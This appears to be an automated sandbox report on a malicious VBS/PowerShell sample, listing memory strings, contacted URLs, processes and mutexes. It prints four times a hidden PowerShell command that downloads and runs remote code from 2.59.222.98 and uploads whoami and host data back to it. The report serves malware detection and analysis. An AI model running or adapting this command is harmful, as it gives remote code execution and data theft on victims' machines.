Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.2786448755.000002A977950000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000008.00000002.2785104957.000002A977746000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.pdb= source: powershell.exe, 00000008.00000002.2785104957.000002A97771B000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000008.00000002.2786448755.000002A97799D000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbh source: powershell.exe, 00000008.00000002.2786448755.000002A97799D000.00000004.00000020.00020000.00000000.sdmp |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.59.222.98 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.59.222.98 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.59.222.98 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.59.222.98 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.59.222.98 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.59.222.98 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.59.222.98 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.59.222.98 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.59.222.98 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.59.222.98 |
Source: powershell.exe, 00000014.00000002.3887745616.0000024A6CC1C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://2.59.222.9 |
Source: powershell.exe, 00000014.00000002.3885321197.0000024A6AB59000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3887745616.0000024A6CBF7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3866941302.0000024A00001000.00000004.00000800.00020000.00000000.sdmp, Layouts.vbs.1.dr |
String found in binary or memory: http://2.59.222.98:28402/page114 |
Source: powershell.exe, 00000014.00000002.3866941302.0000024A004B6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://2.59.222.98:28402/page114Bytestf8.GetBytesesX |
Source: powershell.exe, 00000014.00000002.3866941302.0000024A004B6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://2.59.222.98:28402/page114X |
Source: powershell.exe, 00000008.00000002.2746847374.000002A901676000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2746847374.000002A9015F4000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://2.59.222.98:43820 |
Source: powershell.exe, 00000008.00000002.2746847374.000002A90167E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://2.59.222.98:43820( |
Source: powershell.exe, 00000014.00000002.3866941302.0000024A004B6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://2.59.222.98:43820/SZqGnpR |
Source: powershell.exe, 00000008.00000002.2746847374.000002A901946000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://2.59.222.98:43820/SZqGnpRL |
Source: powershell.exe, 00000014.00000002.3885321197.0000024A6AB59000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3887745616.0000024A6CBF7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3866941302.0000024A00001000.00000004.00000800.00020000.00000000.sdmp, Layouts.vbs.1.dr |
String found in binary or memory: http://2.59.222.98:43820/SZqGnpRLFQIycdKb/page114/upgrade.txt |
Source: powershell.exe, 00000008.00000002.2786374979.000002A9777B0000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://2.59.222.98:43820/szqgnprlfqiycdkb/page114/upgrade.txt |
Source: powershell.exe, 00000014.00000002.3887373822.0000024A6AD65000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.microsoft |
Source: svchost.exe, 00000007.00000002.3103390706.0000028C55600000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.ver) |
Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD41570.4.dr |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab |
Source: svchost.exe, 00000007.00000003.1474568088.0000028C55800000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20 |
Source: powershell.exe, 00000001.00000002.1443251156.0000000006367000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2778411682.000002A9101B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2746847374.000002A901A0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2778411682.000002A910072000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000008.00000002.2746847374.000002A90022D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000001.00000002.1447977927.0000000008AE4000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.opez |
Source: powershell.exe, 00000001.00000002.1437033919.0000000005301000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2746847374.000002A900001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3866941302.0000024A00083000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000008.00000002.2746847374.000002A90022D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000014.00000002.3887373822.0000024A6AD65000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://www.microsoft.co |
Source: powershell.exe, 00000008.00000002.2746847374.000002A900001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3866941302.0000024A0005C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3866941302.0000024A00049000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000001.00000002.1437033919.0000000005301000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB |
Source: powershell.exe, 00000008.00000002.2778411682.000002A910072000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000008.00000002.2778411682.000002A910072000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000008.00000002.2778411682.000002A910072000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: svchost.exe, 00000007.00000003.1474568088.0000028C5587A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://g.live.com/odclientsettings/Prod-C: |
Source: svchost.exe, 00000007.00000003.1474568088.0000028C55800000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C: |
Source: powershell.exe, 00000008.00000002.2746847374.000002A90022D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000008.00000002.2746847374.000002A900C2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3866941302.0000024A0055A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000008.00000002.2785104957.000002A9776E0000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://go.microsoft.coyy |
Source: powershell.exe, 00000001.00000002.1443251156.0000000006367000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2778411682.000002A9101B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2746847374.000002A901A0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2778411682.000002A910072000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/SZqGnpRLFQIycdKb/page114/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page114',$drpy);} |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/SZqGnpRLFQIycdKb/page114/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page114',$drpy);} |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/SZqGnpRLFQIycdKb/page114/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page114',$drpy);} |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/SZqGnpRLFQIycdKb/page114/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page114',$drpy);} |
|
Source: C:\Windows\System32\conhost.exe |
Mutant created: \BaseNamedObjects\Local\SM0:7836:120:WilError_03 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Mutant created: NULL |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3452:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7704:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7768:120:WilError_03 |